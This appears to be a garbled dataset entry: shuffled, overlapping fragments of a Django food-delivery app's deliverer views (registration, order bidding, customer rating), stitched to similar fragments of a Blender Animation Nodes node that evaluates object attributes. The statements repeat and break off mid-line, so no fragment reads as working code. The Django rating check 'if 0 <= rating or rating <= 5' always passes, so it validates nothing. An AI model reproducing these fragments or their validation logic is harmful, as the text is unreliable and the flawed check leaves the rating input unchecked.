"userTypeChecker(my_user) if userIs(user.Deliverer) != True: response = redirect('home-nexus') return response except Exception as",
"context=context) def register(request): my_user = None try: my_user = request.user isType = userTypeChecker(my_user)",
"if request.method == \"POST\": body = parse_req_body(request.body) resturant_id = int(body['id']) reg_resturant = restaurant.Restaurant.objects.get(id=resturant_id)",
"rating = order.delivery_rating return render(request, 'deliverer/order.html', context={ 'order': order, 'customerAddress': customer_address, 'restaurantAddress': restaurant_address",
"resturant_id = int(body['id']) reg_resturant = restaurant.Restaurant.objects.get(id=resturant_id) my_deliverer.restaurant = reg_resturant my_deliverer.save() context['registering'] = False",
"address.RestaurantAddress.objects.get(restaurant=my_resturant) if(request.method == \"POST\"): body = parse_req_body(request.body) rating = int(body['rating']) if 0 <=",
"makes sure user is deliverer try: my_user = request.user userIs = userTypeChecker(my_user) if",
"body['amount'] order_id = body['orderId'] order = restaurant.Order.objects.get(id=order_id) new_bid = restaurant.DeliveryBid(deliverer=my_deliverer, win=False, price=amount, order=order)",
"redirect('deliverer-home') registering = my_deliverer.restaurant == None and my_deliverer.status != 'H' restaurants = restaurant.Restaurant.objects.all()",
"home(request): my_user = None # makes sure user is deliverer try: my_user =",
"= redirect('home-nexus') return response except Exception as e: print(e) response = redirect('home-nexus') return",
"unchosen_orders: if len(pending_bids.filter(order=order)) == 0: open_orders.append(order) print(open_orders) print(pending_bids) print(won_bids) context = { 'warnings':",
"= user.Deliverer.objects.get(user=my_user) registered = len(user.Deliverer.objects.filter(user=my_user).exclude(restaurant__isnull=True)) > 0 and my_deliverer.status == 'H' if registered:",
"order.customer customer_address = address.CustomerAddress.objects.get(customer=customer) my_resturant = user.Deliverer.objects.get(user=my_user).restaurant restaurant_address = address.RestaurantAddress.objects.get(restaurant=my_resturant) if(request.method == \"POST\"):",
"get_object_or_404 from database.models import user, restaurant, address from helper import parse_req_body, userTypeChecker import",
"user.Deliverer.objects.get(user=my_user) registered = len(user.Deliverer.objects.filter(user=my_user).exclude(restaurant__isnull=True)) > 0 and my_deliverer.status == 'H' if registered: return",
"if registered != True: # if not registered return redirect('deliverer-register') if request.method ==",
"context=context) def order(request, pk): my_user = request.user order = get_object_or_404(restaurant.Order, pk=pk) customer =",
"redirect, get_list_or_404, get_object_or_404 from database.models import user, restaurant, address from helper import parse_req_body,",
"True: response = redirect('home-nexus') return response except: response = redirect('home-nexus') return response my_deliverer",
"if 0 <= rating or rating <= 5: order.status = 'D' order.customer_rating =",
"= restaurant.CustomerStatus.objects.get(customer=customer, restaurant=my_resturant) except: customer_status = restaurant.CustomerStatus(customer=customer, restaurant=my_resturant, status='N') customer_status.save() customer_status.update_status(rating) order.save() rating",
"try: my_user = request.user userIs = userTypeChecker(my_user) if userIs(user.Deliverer) != True: response =",
"response my_deliverer = user.Deliverer.objects.get(user=my_user) registered = len(user.Deliverer.objects.filter(user=my_user).exclude(restaurant__isnull=True)) > 0 and my_deliverer.status == 'H'",
"= request.user isType = userTypeChecker(my_user) if isType(user.Deliverer) != True: response = redirect('home-nexus') return",
"restaurant.DeliveryBid(deliverer=my_deliverer, win=False, price=amount, order=order) new_bid.save() unchosen_orders = restaurant.Order.objects.filter(chose_bid=False).filter(restaurant = my_deliverer.restaurant) pending_bids = restaurant.DeliveryBid.objects.filter(deliverer=my_deliverer).filter(win=False)",
"userIs = userTypeChecker(my_user) if userIs(user.Deliverer) != True: response = redirect('home-nexus') return response except",
"parse_req_body(request.body) amount = body['amount'] order_id = body['orderId'] order = restaurant.Order.objects.get(id=order_id) new_bid = restaurant.DeliveryBid(deliverer=my_deliverer,",
"== 0: open_orders.append(order) print(open_orders) print(pending_bids) print(won_bids) context = { 'warnings': my_deliverer.warnings, 'openOrders': open_orders,",
"= None # makes sure user is deliverer try: my_user = request.user userIs",
"= int(body['rating']) if 0 <= rating or rating <= 5: order.status = 'D'",
"= user.Deliverer.objects.get(user=my_user) registered = len(user.Deliverer.objects.filter(user=my_user).exclude(restaurant__isnull=True)) > 0 and my_deliverer.status == 'H' if registered",
"= restaurant.DeliveryBid(deliverer=my_deliverer, win=False, price=amount, order=order) new_bid.save() unchosen_orders = restaurant.Order.objects.filter(chose_bid=False).filter(restaurant = my_deliverer.restaurant) pending_bids =",
"except: customer_status = restaurant.CustomerStatus(customer=customer, restaurant=my_resturant, status='N') customer_status.save() customer_status.update_status(rating) order.save() rating = order.delivery_rating return",
"= restaurant.Restaurant.objects.all() context={'restaurants': restaurants, 'registering': registering} if request.method == \"POST\": body = parse_req_body(request.body)",
"rating try: customer_status = restaurant.CustomerStatus.objects.get(customer=customer, restaurant=my_resturant) except: customer_status = restaurant.CustomerStatus(customer=customer, restaurant=my_resturant, status='N') customer_status.save()",
"= len(user.Deliverer.objects.filter(user=my_user).exclude(restaurant__isnull=True)) > 0 and my_deliverer.status == 'H' if registered != True: #",
"'H' if registered: return redirect('deliverer-home') registering = my_deliverer.restaurant == None and my_deliverer.status !=",
"open_orders = [] for order in unchosen_orders: if len(pending_bids.filter(order=order)) == 0: open_orders.append(order) print(open_orders)",
"order in unchosen_orders: if len(pending_bids.filter(order=order)) == 0: open_orders.append(order) print(open_orders) print(pending_bids) print(won_bids) context =",
"= my_deliverer.restaurant == None and my_deliverer.status != 'H' restaurants = restaurant.Restaurant.objects.all() context={'restaurants': restaurants,",
"deliverer try: my_user = request.user userIs = userTypeChecker(my_user) if userIs(user.Deliverer) != True: response",
"except: response = redirect('home-nexus') return response my_deliverer = user.Deliverer.objects.get(user=my_user) registered = len(user.Deliverer.objects.filter(user=my_user).exclude(restaurant__isnull=True)) >",
"if not registered return redirect('deliverer-register') if request.method == \"POST\": # If bidded body",
"= get_object_or_404(restaurant.Order, pk=pk) customer = order.customer customer_address = address.CustomerAddress.objects.get(customer=customer) my_resturant = user.Deliverer.objects.get(user=my_user).restaurant restaurant_address",
"Exception as e: print(e) response = redirect('home-nexus') return response except: response = redirect('home-nexus')",
"except Exception as e: print(e) response = redirect('home-nexus') return response except: response =",
"rating = int(body['rating']) if 0 <= rating or rating <= 5: order.status =",
"'H' if registered != True: # if not registered return redirect('deliverer-register') if request.method",
"return redirect('deliverer-home') registering = my_deliverer.restaurant == None and my_deliverer.status != 'H' restaurants =",
"parse_req_body(request.body) rating = int(body['rating']) if 0 <= rating or rating <= 5: order.status",
"userTypeChecker(my_user) if isType(user.Deliverer) != True: response = redirect('home-nexus') return response except: response =",
"int(body['rating']) if 0 <= rating or rating <= 5: order.status = 'D' order.customer_rating",
"import parse_req_body, userTypeChecker import django.views # Create your views here. def home(request): my_user",
"len(pending_bids.filter(order=order)) == 0: open_orders.append(order) print(open_orders) print(pending_bids) print(won_bids) context = { 'warnings': my_deliverer.warnings, 'openOrders':",
"my_deliverer.status == 'H' if registered: return redirect('deliverer-home') registering = my_deliverer.restaurant == None and",
"print(won_bids) context = { 'warnings': my_deliverer.warnings, 'openOrders': open_orders, 'pendingBids': pending_bids, 'winningBids': won_bids }",
"# if not registered return redirect('deliverer-register') if request.method == \"POST\": # If bidded",
"'registering': registering} if request.method == \"POST\": body = parse_req_body(request.body) resturant_id = int(body['id']) reg_resturant",
"pending_bids = restaurant.DeliveryBid.objects.filter(deliverer=my_deliverer).filter(win=False) won_bids = restaurant.DeliveryBid.objects.filter(deliverer=my_deliverer).filter(win=True) open_orders = [] for order in unchosen_orders:",
"my_deliverer.save() context['registering'] = False return render(request, 'deliverer/register.html', context=context) def order(request, pk): my_user =",
"== \"POST\"): body = parse_req_body(request.body) rating = int(body['rating']) if 0 <= rating or",
"= restaurant.CustomerStatus(customer=customer, restaurant=my_resturant, status='N') customer_status.save() customer_status.update_status(rating) order.save() rating = order.delivery_rating return render(request, 'deliverer/order.html',",
"restaurant.CustomerStatus.objects.get(customer=customer, restaurant=my_resturant) except: customer_status = restaurant.CustomerStatus(customer=customer, restaurant=my_resturant, status='N') customer_status.save() customer_status.update_status(rating) order.save() rating =",
"} return render(request, 'deliverer/home.html', context=context) def register(request): my_user = None try: my_user =",
"new_bid = restaurant.DeliveryBid(deliverer=my_deliverer, win=False, price=amount, order=order) new_bid.save() unchosen_orders = restaurant.Order.objects.filter(chose_bid=False).filter(restaurant = my_deliverer.restaurant) pending_bids",
"\"POST\": body = parse_req_body(request.body) resturant_id = int(body['id']) reg_resturant = restaurant.Restaurant.objects.get(id=resturant_id) my_deliverer.restaurant = reg_resturant",
"body = parse_req_body(request.body) rating = int(body['rating']) if 0 <= rating or rating <=",
"my_user = None # makes sure user is deliverer try: my_user = request.user",
"\"POST\": # If bidded body = parse_req_body(request.body) amount = body['amount'] order_id = body['orderId']",
"= restaurant.Order.objects.get(id=order_id) new_bid = restaurant.DeliveryBid(deliverer=my_deliverer, win=False, price=amount, order=order) new_bid.save() unchosen_orders = restaurant.Order.objects.filter(chose_bid=False).filter(restaurant =",
"len(user.Deliverer.objects.filter(user=my_user).exclude(restaurant__isnull=True)) > 0 and my_deliverer.status == 'H' if registered != True: # if",
"= restaurant.DeliveryBid.objects.filter(deliverer=my_deliverer).filter(win=False) won_bids = restaurant.DeliveryBid.objects.filter(deliverer=my_deliverer).filter(win=True) open_orders = [] for order in unchosen_orders: if",
"order = restaurant.Order.objects.get(id=order_id) new_bid = restaurant.DeliveryBid(deliverer=my_deliverer, win=False, price=amount, order=order) new_bid.save() unchosen_orders = restaurant.Order.objects.filter(chose_bid=False).filter(restaurant",
"or rating <= 5: order.status = 'D' order.customer_rating = rating try: customer_status =",
"restaurant=my_resturant) except: customer_status = restaurant.CustomerStatus(customer=customer, restaurant=my_resturant, status='N') customer_status.save() customer_status.update_status(rating) order.save() rating = order.delivery_rating",
"False return render(request, 'deliverer/register.html', context=context) def order(request, pk): my_user = request.user order =",
"restaurant.DeliveryBid.objects.filter(deliverer=my_deliverer).filter(win=False) won_bids = restaurant.DeliveryBid.objects.filter(deliverer=my_deliverer).filter(win=True) open_orders = [] for order in unchosen_orders: if len(pending_bids.filter(order=order))",
"== \"POST\": # If bidded body = parse_req_body(request.body) amount = body['amount'] order_id =",
"customer_status = restaurant.CustomerStatus.objects.get(customer=customer, restaurant=my_resturant) except: customer_status = restaurant.CustomerStatus(customer=customer, restaurant=my_resturant, status='N') customer_status.save() customer_status.update_status(rating) order.save()",
"django.shortcuts import render, redirect, get_list_or_404, get_object_or_404 from database.models import user, restaurant, address from",
"response = redirect('home-nexus') return response my_deliverer = user.Deliverer.objects.get(user=my_user) registered = len(user.Deliverer.objects.filter(user=my_user).exclude(restaurant__isnull=True)) > 0",
"response = redirect('home-nexus') return response except: response = redirect('home-nexus') return response my_deliverer =",
"!= True: response = redirect('home-nexus') return response except Exception as e: print(e) response",
"response except: response = redirect('home-nexus') return response my_deliverer = user.Deliverer.objects.get(user=my_user) registered = len(user.Deliverer.objects.filter(user=my_user).exclude(restaurant__isnull=True))",
"== \"POST\": body = parse_req_body(request.body) resturant_id = int(body['id']) reg_resturant = restaurant.Restaurant.objects.get(id=resturant_id) my_deliverer.restaurant =",
"get_list_or_404, get_object_or_404 from database.models import user, restaurant, address from helper import parse_req_body, userTypeChecker",
"if userIs(user.Deliverer) != True: response = redirect('home-nexus') return response except Exception as e:",
"open_orders.append(order) print(open_orders) print(pending_bids) print(won_bids) context = { 'warnings': my_deliverer.warnings, 'openOrders': open_orders, 'pendingBids': pending_bids,",
"'deliverer/home.html', context=context) def register(request): my_user = None try: my_user = request.user isType =",
"and my_deliverer.status != 'H' restaurants = restaurant.Restaurant.objects.all() context={'restaurants': restaurants, 'registering': registering} if request.method",
"userIs(user.Deliverer) != True: response = redirect('home-nexus') return response except Exception as e: print(e)",
"body = parse_req_body(request.body) resturant_id = int(body['id']) reg_resturant = restaurant.Restaurant.objects.get(id=resturant_id) my_deliverer.restaurant = reg_resturant my_deliverer.save()",
"my_deliverer.restaurant = reg_resturant my_deliverer.save() context['registering'] = False return render(request, 'deliverer/register.html', context=context) def order(request,",
"helper import parse_req_body, userTypeChecker import django.views # Create your views here. def home(request):",
"customer = order.customer customer_address = address.CustomerAddress.objects.get(customer=customer) my_resturant = user.Deliverer.objects.get(user=my_user).restaurant restaurant_address = address.RestaurantAddress.objects.get(restaurant=my_resturant) if(request.method",
"customer_status.update_status(rating) order.save() rating = order.delivery_rating return render(request, 'deliverer/order.html', context={ 'order': order, 'customerAddress': customer_address,",
"pending_bids, 'winningBids': won_bids } return render(request, 'deliverer/home.html', context=context) def register(request): my_user = None",
"True: # if not registered return redirect('deliverer-register') if request.method == \"POST\": # If",
"my_user = request.user userIs = userTypeChecker(my_user) if userIs(user.Deliverer) != True: response = redirect('home-nexus')",
"my_user = request.user order = get_object_or_404(restaurant.Order, pk=pk) customer = order.customer customer_address = address.CustomerAddress.objects.get(customer=customer)",
"restaurant.DeliveryBid.objects.filter(deliverer=my_deliverer).filter(win=True) open_orders = [] for order in unchosen_orders: if len(pending_bids.filter(order=order)) == 0: open_orders.append(order)",
"5: order.status = 'D' order.customer_rating = rating try: customer_status = restaurant.CustomerStatus.objects.get(customer=customer, restaurant=my_resturant) except:",
"from database.models import user, restaurant, address from helper import parse_req_body, userTypeChecker import django.views",
"parse_req_body(request.body) resturant_id = int(body['id']) reg_resturant = restaurant.Restaurant.objects.get(id=resturant_id) my_deliverer.restaurant = reg_resturant my_deliverer.save() context['registering'] =",
"restaurant.CustomerStatus(customer=customer, restaurant=my_resturant, status='N') customer_status.save() customer_status.update_status(rating) order.save() rating = order.delivery_rating return render(request, 'deliverer/order.html', context={",
"redirect('home-nexus') return response except Exception as e: print(e) response = redirect('home-nexus') return response",
"request.method == \"POST\": # If bidded body = parse_req_body(request.body) amount = body['amount'] order_id",
"for order in unchosen_orders: if len(pending_bids.filter(order=order)) == 0: open_orders.append(order) print(open_orders) print(pending_bids) print(won_bids) context",
"= rating try: customer_status = restaurant.CustomerStatus.objects.get(customer=customer, restaurant=my_resturant) except: customer_status = restaurant.CustomerStatus(customer=customer, restaurant=my_resturant, status='N')",
"= order.delivery_rating return render(request, 'deliverer/order.html', context={ 'order': order, 'customerAddress': customer_address, 'restaurantAddress': restaurant_address })",
"render, redirect, get_list_or_404, get_object_or_404 from database.models import user, restaurant, address from helper import",
"my_resturant = user.Deliverer.objects.get(user=my_user).restaurant restaurant_address = address.RestaurantAddress.objects.get(restaurant=my_resturant) if(request.method == \"POST\"): body = parse_req_body(request.body) rating",
"not registered return redirect('deliverer-register') if request.method == \"POST\": # If bidded body =",
"print(pending_bids) print(won_bids) context = { 'warnings': my_deliverer.warnings, 'openOrders': open_orders, 'pendingBids': pending_bids, 'winningBids': won_bids",
"status='N') customer_status.save() customer_status.update_status(rating) order.save() rating = order.delivery_rating return render(request, 'deliverer/order.html', context={ 'order': order,",
"get_object_or_404(restaurant.Order, pk=pk) customer = order.customer customer_address = address.CustomerAddress.objects.get(customer=customer) my_resturant = user.Deliverer.objects.get(user=my_user).restaurant restaurant_address =",
"isType(user.Deliverer) != True: response = redirect('home-nexus') return response except: response = redirect('home-nexus') return",
"rating <= 5: order.status = 'D' order.customer_rating = rating try: customer_status = restaurant.CustomerStatus.objects.get(customer=customer,",
"= address.RestaurantAddress.objects.get(restaurant=my_resturant) if(request.method == \"POST\"): body = parse_req_body(request.body) rating = int(body['rating']) if 0",
"order=order) new_bid.save() unchosen_orders = restaurant.Order.objects.filter(chose_bid=False).filter(restaurant = my_deliverer.restaurant) pending_bids = restaurant.DeliveryBid.objects.filter(deliverer=my_deliverer).filter(win=False) won_bids = restaurant.DeliveryBid.objects.filter(deliverer=my_deliverer).filter(win=True)",
"registered = len(user.Deliverer.objects.filter(user=my_user).exclude(restaurant__isnull=True)) > 0 and my_deliverer.status == 'H' if registered: return redirect('deliverer-home')",
"register(request): my_user = None try: my_user = request.user isType = userTypeChecker(my_user) if isType(user.Deliverer)",
"!= True: # if not registered return redirect('deliverer-register') if request.method == \"POST\": #",
"= { 'warnings': my_deliverer.warnings, 'openOrders': open_orders, 'pendingBids': pending_bids, 'winningBids': won_bids } return render(request,",
"= body['orderId'] order = restaurant.Order.objects.get(id=order_id) new_bid = restaurant.DeliveryBid(deliverer=my_deliverer, win=False, price=amount, order=order) new_bid.save() unchosen_orders"
] |
[
"\"Value\", \"value\") def draw(self, layout): layout.prop(self, \"attribute\", text = \"\") def drawAdvanced(self, layout):",
"\" if object: self.setErrorMessage('Attribute not found')\" yield \" value = None\" @property def",
"\"Object Attribute Input\" bl_width_default = 160 errorHandlingType = \"MESSAGE\" attribute: StringProperty(name = \"Attribute\",",
"found')\" yield \" value = None\" @property def evaluationExpression(self): if self.attribute.startswith(\"[\"): return \"value",
"Input\" bl_width_default = 160 errorHandlingType = \"MESSAGE\" attribute: StringProperty(name = \"Attribute\", default =",
"show = len(self.attribute.strip()) > 0)\" yield \"value = None\" return yield \"try:\" yield",
"+ self.attribute def createAutoExecutionTrigger(self): item = self.nodeTree.autoExecution.customTriggers.new(\"MONITOR_PROPERTY\") item.idType = \"OBJECT\" item.dataPath = self.attribute",
"yield \"try:\" yield \" \" + code yield \"except:\" yield \" if object:",
"= executionCodeChanged) def create(self): self.newInput(\"Object\", \"Object\", \"object\", defaultDrawType = \"PROPERTY_ONLY\") self.newOutput(\"Generic\", \"Value\", \"value\")",
"def create(self): self.newInput(\"Object\", \"Object\", \"object\", defaultDrawType = \"PROPERTY_ONLY\") self.newOutput(\"Generic\", \"Value\", \"value\") def draw(self,",
"* from ... utils.code import isCodeValid from ... events import executionCodeChanged from ...",
"import bpy from bpy.props import * from ... utils.code import isCodeValid from ...",
"text = \"\") def drawAdvanced(self, layout): self.invokeFunction(layout, \"createAutoExecutionTrigger\", text = \"Create Execution Trigger\")",
"Trigger\") def getExecutionCode(self, required): code = self.evaluationExpression if not isCodeValid(code): yield \"self.setErrorMessage('Invalid Syntax',",
"\"Object\", \"object\", defaultDrawType = \"PROPERTY_ONLY\") self.newOutput(\"Generic\", \"Value\", \"value\") def draw(self, layout): layout.prop(self, \"attribute\",",
"required): code = self.evaluationExpression if not isCodeValid(code): yield \"self.setErrorMessage('Invalid Syntax', show = len(self.attribute.strip())",
"<reponame>Tilapiatsu/blender-custom_conf import bpy from bpy.props import * from ... utils.code import isCodeValid from",
"... utils.code import isCodeValid from ... events import executionCodeChanged from ... base_types import",
"\"Create Execution Trigger\") def getExecutionCode(self, required): code = self.evaluationExpression if not isCodeValid(code): yield",
"None\" return yield \"try:\" yield \" \" + code yield \"except:\" yield \"",
"from bpy.props import * from ... utils.code import isCodeValid from ... events import",
"def evaluationExpression(self): if self.attribute.startswith(\"[\"): return \"value = object\" + self.attribute else: return \"value",
"\"value = None\" return yield \"try:\" yield \" \" + code yield \"except:\"",
"\"value = object\" + self.attribute else: return \"value = object.\" + self.attribute def",
"bl_label = \"Object Attribute Input\" bl_width_default = 160 errorHandlingType = \"MESSAGE\" attribute: StringProperty(name",
"= None\" return yield \"try:\" yield \" \" + code yield \"except:\" yield",
"text = \"Create Execution Trigger\") def getExecutionCode(self, required): code = self.evaluationExpression if not",
"= \"Create Execution Trigger\") def getExecutionCode(self, required): code = self.evaluationExpression if not isCodeValid(code):",
"value = None\" @property def evaluationExpression(self): if self.attribute.startswith(\"[\"): return \"value = object\" +",
"= \"PROPERTY_ONLY\") self.newOutput(\"Generic\", \"Value\", \"value\") def draw(self, layout): layout.prop(self, \"attribute\", text = \"\")",
"not isCodeValid(code): yield \"self.setErrorMessage('Invalid Syntax', show = len(self.attribute.strip()) > 0)\" yield \"value =",
"@property def evaluationExpression(self): if self.attribute.startswith(\"[\"): return \"value = object\" + self.attribute else: return",
"import isCodeValid from ... events import executionCodeChanged from ... base_types import AnimationNode class",
"defaultDrawType = \"PROPERTY_ONLY\") self.newOutput(\"Generic\", \"Value\", \"value\") def draw(self, layout): layout.prop(self, \"attribute\", text =",
"= \"MESSAGE\" attribute: StringProperty(name = \"Attribute\", default = \"\", update = executionCodeChanged) def",
"code = self.evaluationExpression if not isCodeValid(code): yield \"self.setErrorMessage('Invalid Syntax', show = len(self.attribute.strip()) >",
"create(self): self.newInput(\"Object\", \"Object\", \"object\", defaultDrawType = \"PROPERTY_ONLY\") self.newOutput(\"Generic\", \"Value\", \"value\") def draw(self, layout):",
"utils.code import isCodeValid from ... events import executionCodeChanged from ... base_types import AnimationNode",
"\"Attribute\", default = \"\", update = executionCodeChanged) def create(self): self.newInput(\"Object\", \"Object\", \"object\", defaultDrawType",
"= self.evaluationExpression if not isCodeValid(code): yield \"self.setErrorMessage('Invalid Syntax', show = len(self.attribute.strip()) > 0)\"",
"bpy.props import * from ... utils.code import isCodeValid from ... events import executionCodeChanged",
"not found')\" yield \" value = None\" @property def evaluationExpression(self): if self.attribute.startswith(\"[\"): return",
"createAutoExecutionTrigger(self): item = self.nodeTree.autoExecution.customTriggers.new(\"MONITOR_PROPERTY\") item.idType = \"OBJECT\" item.dataPath = self.attribute item.object = self.inputs[\"Object\"].object",
"\"object\", defaultDrawType = \"PROPERTY_ONLY\") self.newOutput(\"Generic\", \"Value\", \"value\") def draw(self, layout): layout.prop(self, \"attribute\", text",
"= 160 errorHandlingType = \"MESSAGE\" attribute: StringProperty(name = \"Attribute\", default = \"\", update",
"self.invokeFunction(layout, \"createAutoExecutionTrigger\", text = \"Create Execution Trigger\") def getExecutionCode(self, required): code = self.evaluationExpression",
"yield \" value = None\" @property def evaluationExpression(self): if self.attribute.startswith(\"[\"): return \"value =",
"Attribute Input\" bl_width_default = 160 errorHandlingType = \"MESSAGE\" attribute: StringProperty(name = \"Attribute\", default",
"Execution Trigger\") def getExecutionCode(self, required): code = self.evaluationExpression if not isCodeValid(code): yield \"self.setErrorMessage('Invalid",
"= \"\", update = executionCodeChanged) def create(self): self.newInput(\"Object\", \"Object\", \"object\", defaultDrawType = \"PROPERTY_ONLY\")",
"object: self.setErrorMessage('Attribute not found')\" yield \" value = None\" @property def evaluationExpression(self): if",
"return \"value = object.\" + self.attribute def createAutoExecutionTrigger(self): item = self.nodeTree.autoExecution.customTriggers.new(\"MONITOR_PROPERTY\") item.idType =",
"layout): layout.prop(self, \"attribute\", text = \"\") def drawAdvanced(self, layout): self.invokeFunction(layout, \"createAutoExecutionTrigger\", text =",
"\" value = None\" @property def evaluationExpression(self): if self.attribute.startswith(\"[\"): return \"value = object\"",
"yield \" \" + code yield \"except:\" yield \" if object: self.setErrorMessage('Attribute not",
"= \"Attribute\", default = \"\", update = executionCodeChanged) def create(self): self.newInput(\"Object\", \"Object\", \"object\",",
"Syntax', show = len(self.attribute.strip()) > 0)\" yield \"value = None\" return yield \"try:\"",
"def draw(self, layout): layout.prop(self, \"attribute\", text = \"\") def drawAdvanced(self, layout): self.invokeFunction(layout, \"createAutoExecutionTrigger\",",
"bl_width_default = 160 errorHandlingType = \"MESSAGE\" attribute: StringProperty(name = \"Attribute\", default = \"\",",
"= len(self.attribute.strip()) > 0)\" yield \"value = None\" return yield \"try:\" yield \"",
"layout.prop(self, \"attribute\", text = \"\") def drawAdvanced(self, layout): self.invokeFunction(layout, \"createAutoExecutionTrigger\", text = \"Create",
"\"createAutoExecutionTrigger\", text = \"Create Execution Trigger\") def getExecutionCode(self, required): code = self.evaluationExpression if",
"self.evaluationExpression if not isCodeValid(code): yield \"self.setErrorMessage('Invalid Syntax', show = len(self.attribute.strip()) > 0)\" yield",
"self.attribute def createAutoExecutionTrigger(self): item = self.nodeTree.autoExecution.customTriggers.new(\"MONITOR_PROPERTY\") item.idType = \"OBJECT\" item.dataPath = self.attribute item.object",
"import * from ... utils.code import isCodeValid from ... events import executionCodeChanged from",
"bpy from bpy.props import * from ... utils.code import isCodeValid from ... events",
"return \"value = object\" + self.attribute else: return \"value = object.\" + self.attribute",
"import AnimationNode class ObjectAttributeInputNode(bpy.types.Node, AnimationNode): bl_idname = \"an_ObjectAttributeInputNode\" bl_label = \"Object Attribute Input\"",
"... events import executionCodeChanged from ... base_types import AnimationNode class ObjectAttributeInputNode(bpy.types.Node, AnimationNode): bl_idname",
"160 errorHandlingType = \"MESSAGE\" attribute: StringProperty(name = \"Attribute\", default = \"\", update =",
"= object.\" + self.attribute def createAutoExecutionTrigger(self): item = self.nodeTree.autoExecution.customTriggers.new(\"MONITOR_PROPERTY\") item.idType = \"OBJECT\" item.dataPath",
"isCodeValid(code): yield \"self.setErrorMessage('Invalid Syntax', show = len(self.attribute.strip()) > 0)\" yield \"value = None\"",
"\"self.setErrorMessage('Invalid Syntax', show = len(self.attribute.strip()) > 0)\" yield \"value = None\" return yield",
"ObjectAttributeInputNode(bpy.types.Node, AnimationNode): bl_idname = \"an_ObjectAttributeInputNode\" bl_label = \"Object Attribute Input\" bl_width_default = 160",
"from ... utils.code import isCodeValid from ... events import executionCodeChanged from ... base_types",
"def getExecutionCode(self, required): code = self.evaluationExpression if not isCodeValid(code): yield \"self.setErrorMessage('Invalid Syntax', show",
"0)\" yield \"value = None\" return yield \"try:\" yield \" \" + code",
"base_types import AnimationNode class ObjectAttributeInputNode(bpy.types.Node, AnimationNode): bl_idname = \"an_ObjectAttributeInputNode\" bl_label = \"Object Attribute",
"return yield \"try:\" yield \" \" + code yield \"except:\" yield \" if",
"object.\" + self.attribute def createAutoExecutionTrigger(self): item = self.nodeTree.autoExecution.customTriggers.new(\"MONITOR_PROPERTY\") item.idType = \"OBJECT\" item.dataPath =",
"\" + code yield \"except:\" yield \" if object: self.setErrorMessage('Attribute not found')\" yield",
"StringProperty(name = \"Attribute\", default = \"\", update = executionCodeChanged) def create(self): self.newInput(\"Object\", \"Object\",",
"yield \"self.setErrorMessage('Invalid Syntax', show = len(self.attribute.strip()) > 0)\" yield \"value = None\" return",
"isCodeValid from ... events import executionCodeChanged from ... base_types import AnimationNode class ObjectAttributeInputNode(bpy.types.Node,",
"update = executionCodeChanged) def create(self): self.newInput(\"Object\", \"Object\", \"object\", defaultDrawType = \"PROPERTY_ONLY\") self.newOutput(\"Generic\", \"Value\",",
"if self.attribute.startswith(\"[\"): return \"value = object\" + self.attribute else: return \"value = object.\"",
"+ self.attribute else: return \"value = object.\" + self.attribute def createAutoExecutionTrigger(self): item =",
"\"try:\" yield \" \" + code yield \"except:\" yield \" if object: self.setErrorMessage('Attribute",
"= \"Object Attribute Input\" bl_width_default = 160 errorHandlingType = \"MESSAGE\" attribute: StringProperty(name =",
"yield \"value = None\" return yield \"try:\" yield \" \" + code yield",
"= object\" + self.attribute else: return \"value = object.\" + self.attribute def createAutoExecutionTrigger(self):",
"import executionCodeChanged from ... base_types import AnimationNode class ObjectAttributeInputNode(bpy.types.Node, AnimationNode): bl_idname = \"an_ObjectAttributeInputNode\"",
"self.setErrorMessage('Attribute not found')\" yield \" value = None\" @property def evaluationExpression(self): if self.attribute.startswith(\"[\"):",
"\"value = object.\" + self.attribute def createAutoExecutionTrigger(self): item = self.nodeTree.autoExecution.customTriggers.new(\"MONITOR_PROPERTY\") item.idType = \"OBJECT\"",
"len(self.attribute.strip()) > 0)\" yield \"value = None\" return yield \"try:\" yield \" \"",
"def drawAdvanced(self, layout): self.invokeFunction(layout, \"createAutoExecutionTrigger\", text = \"Create Execution Trigger\") def getExecutionCode(self, required):",
"def createAutoExecutionTrigger(self): item = self.nodeTree.autoExecution.customTriggers.new(\"MONITOR_PROPERTY\") item.idType = \"OBJECT\" item.dataPath = self.attribute item.object =",
"AnimationNode class ObjectAttributeInputNode(bpy.types.Node, AnimationNode): bl_idname = \"an_ObjectAttributeInputNode\" bl_label = \"Object Attribute Input\" bl_width_default",
"AnimationNode): bl_idname = \"an_ObjectAttributeInputNode\" bl_label = \"Object Attribute Input\" bl_width_default = 160 errorHandlingType",
"if not isCodeValid(code): yield \"self.setErrorMessage('Invalid Syntax', show = len(self.attribute.strip()) > 0)\" yield \"value",
"yield \" if object: self.setErrorMessage('Attribute not found')\" yield \" value = None\" @property",
"from ... events import executionCodeChanged from ... base_types import AnimationNode class ObjectAttributeInputNode(bpy.types.Node, AnimationNode):",
"executionCodeChanged from ... base_types import AnimationNode class ObjectAttributeInputNode(bpy.types.Node, AnimationNode): bl_idname = \"an_ObjectAttributeInputNode\" bl_label",
"self.newOutput(\"Generic\", \"Value\", \"value\") def draw(self, layout): layout.prop(self, \"attribute\", text = \"\") def drawAdvanced(self,",
"executionCodeChanged) def create(self): self.newInput(\"Object\", \"Object\", \"object\", defaultDrawType = \"PROPERTY_ONLY\") self.newOutput(\"Generic\", \"Value\", \"value\") def",
"= \"an_ObjectAttributeInputNode\" bl_label = \"Object Attribute Input\" bl_width_default = 160 errorHandlingType = \"MESSAGE\"",
"\"\") def drawAdvanced(self, layout): self.invokeFunction(layout, \"createAutoExecutionTrigger\", text = \"Create Execution Trigger\") def getExecutionCode(self,",
"\" \" + code yield \"except:\" yield \" if object: self.setErrorMessage('Attribute not found')\"",
"drawAdvanced(self, layout): self.invokeFunction(layout, \"createAutoExecutionTrigger\", text = \"Create Execution Trigger\") def getExecutionCode(self, required): code",
"\"\", update = executionCodeChanged) def create(self): self.newInput(\"Object\", \"Object\", \"object\", defaultDrawType = \"PROPERTY_ONLY\") self.newOutput(\"Generic\",",
"default = \"\", update = executionCodeChanged) def create(self): self.newInput(\"Object\", \"Object\", \"object\", defaultDrawType =",
"self.newInput(\"Object\", \"Object\", \"object\", defaultDrawType = \"PROPERTY_ONLY\") self.newOutput(\"Generic\", \"Value\", \"value\") def draw(self, layout): layout.prop(self,",
"\"PROPERTY_ONLY\") self.newOutput(\"Generic\", \"Value\", \"value\") def draw(self, layout): layout.prop(self, \"attribute\", text = \"\") def",
"class ObjectAttributeInputNode(bpy.types.Node, AnimationNode): bl_idname = \"an_ObjectAttributeInputNode\" bl_label = \"Object Attribute Input\" bl_width_default =",
